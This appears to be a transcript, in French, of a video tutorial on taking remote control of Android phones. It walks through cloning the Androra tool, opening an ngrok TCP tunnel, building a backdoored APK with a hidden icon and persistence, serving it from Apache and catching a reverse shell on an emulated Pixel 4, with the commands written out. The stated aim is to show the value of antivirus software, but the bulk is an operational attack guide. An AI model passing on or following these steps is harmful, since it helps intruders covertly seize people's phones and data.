Aujourd'hui, à travers cette vidéo, nous allons voir comment nous pouvons prendre le contrôle de n'importe quel appareil Android à travers Internet. Donc pour cela, nous allons utiliser une machine virtuelle qui va être notre téléphone qui va jouer le rôle de victime. Et on va utiliser également un script nommé Androra, un script Python qui va nous permettre de créer des listeners et de générer notre fichier APK malveillant nous permettant de prendre le contrôle du téléphone. Et pour finir, nous utiliserons ngrok pour faire du tunneling avec le protocole TCP pour nous permettre de recevoir les informations à travers Internet. Donc cette vidéo a également pour but de vous montrer comment c'est facile de pouvoir prendre le contrôle de n'importe quel appareil Android et que ça ne nécessite vraiment pas une grande connaissance pour pouvoir exécuter cette technique. Et cette vidéo est également à but préventif parce que énormément de personnes pensent que les antivirus ne servent à rien sur les téléphones. Et c'est pour cela donc que j'ai décidé de désactiver les antivirus sur le téléphone et vous montrer à quel point c'est important d'en avoir pour se protéger contre ce genre d'attaque. Donc pour notre machine virtuelle, notre téléphone qui va jouer le rôle de victime, j'ai choisi le Google Pixel 4, donc un téléphone sous Android et qui est émulé à partir de Android Studio. Donc on se retrouve sur le repo GitHub de Androra. Si on descend juste en dessous, on va trouver les divers avantages de Androra. Donc on a tout d'abord une icône qui va être invisible après l'installation de l'application. On va voir également une persistance de la backdoor. Et l'application va automatiquement se relancer à chaque allumage du téléphone. A savoir également que la signature des fichiers APK a été partagée par VirusTotal. Donc il est probable que certains antivirus reconnaissent le fichier comme malveillant. Pour le télécharger, c'est très simple, il suffit d'aller dans Code, de copier le lien, et ensuite, après avoir ouvert un terminal, de taper la commande git clone suivi du lien. Donc pour ma part, je l'ai déjà installé. On va donc ensuite ouvrir notre tunnel à l'aide de ngrok. Donc pour ça, on va ouvrir un tunnel sur le protocole TCP sur le port 1, 2, 3, 4. Donc pour cela, il suffit de taper la commande ngrok tcp 1, 2, 3, 4. Et donc on observe bien que notre tunnel est ouvert et ici très important, on a le lien de notre tunnel qui va nous permettre de transiger les informations de notre fichier APK jusqu'à nous, donc ici notre adresse locale. Donc on va ensuite aller se balader dans le répertoire Androra, donc pour ça on fait un cd Androra. Donc pour générer notre fichier malveillant, on va faire un python 3 androra.py suivi des paramètres -build -i. Ici on met l'adresse de notre tunnel qui se situe juste ici, suivi du port du tunnel qui se situe juste ici, et suivi donc de notre sortie de notre fichier malveillant, donc pour moi ce sera bad.apk. Donc ici notre fichier APK va se générer. Et donc on va ensuite copier notre fichier malveillant dans notre répertoire web. Donc pour ça on fait un sudo copy, donc cp, notre fichier malveillant suivi du chemin de votre répertoire web. Donc on va ensuite taper la commande sudo systemctl start apache2.service pour démarrer notre serveur web sous Apache. On peut d'ailleurs remplacer start par statut pour voir l'état de notre serveur. Donc pour le ma part, on voit bien ici qu'il est actif. Donc on va ensuite démarrer un listener pour attendre une connexion de la part de notre fichier malveillant. Donc pour cela, on va taper la commande python 3 androra.py suivi des paramètres -shell -i suivi de notre adresse locale et suivi du port 1, 2, 3, 4. Donc ici, notre listener est bien en attente d'une connexion. Donc de retour sur notre machine virtuelle, on va se connecter à notre serveur Apache pour pouvoir tout simplement récupérer notre fichier malveillant. Donc après avoir installé l'application, lorsque je vais cliquer sur Open, je vais normalement recevoir donc une connexion sur mon listener et avoir un contrôle d'accès total sur le téléphone. Donc attention. Donc évidemment ici on a énormément de permissions, mais comme n'importe qui, on s'en fiche, on clique sur continuer. Ici on clique sur OK. Et voilà, on observe ici qu'on a donc un reverse shell qui a été ouvert. On a donc un accès total sur le téléphone. On peut donc taper la commande help pour avoir la liste des commandes possibles sur le téléphone.
Donc on peut par exemple essayer la commande Device Info pour en savoir plus sur le téléphone. Donc si on regarde juste ici, on voit le modèle du téléphone. Si on retourne sur notre machine virtuelle, on voit ici que ça correspond bien à notre modèle affiché juste ici. On peut également ouvrir un shell sur le téléphone, un terminal. Donc par exemple si je tape un Who am I, ici on a l'utilisateur auquel on appartient sur le téléphone. Donc évidemment je ne suis pas administrateur, pour ça il va falloir faire une escalation de privilèges. Donc comme vous avez pu voir, j'ai réussi à gagner un accès quasi total avec les privilèges user sur le téléphone et qui va quand même me permettre de faire énormément de choses sur le téléphone. C'est pour ça qu'il est vraiment important d'installer un antivirus sur son téléphone même s'il est gratuit pour se protéger contre les liens malveillants, contre les fichiers malveillants et éviter ce genre d'attaque pour protéger vos données. Donc sur ce, merci d'avoir suivi cette vidéo, n'hésitez pas à liker, à commenter et surtout à vous abonner. Et puis on se retrouve pour une prochaine vidéo.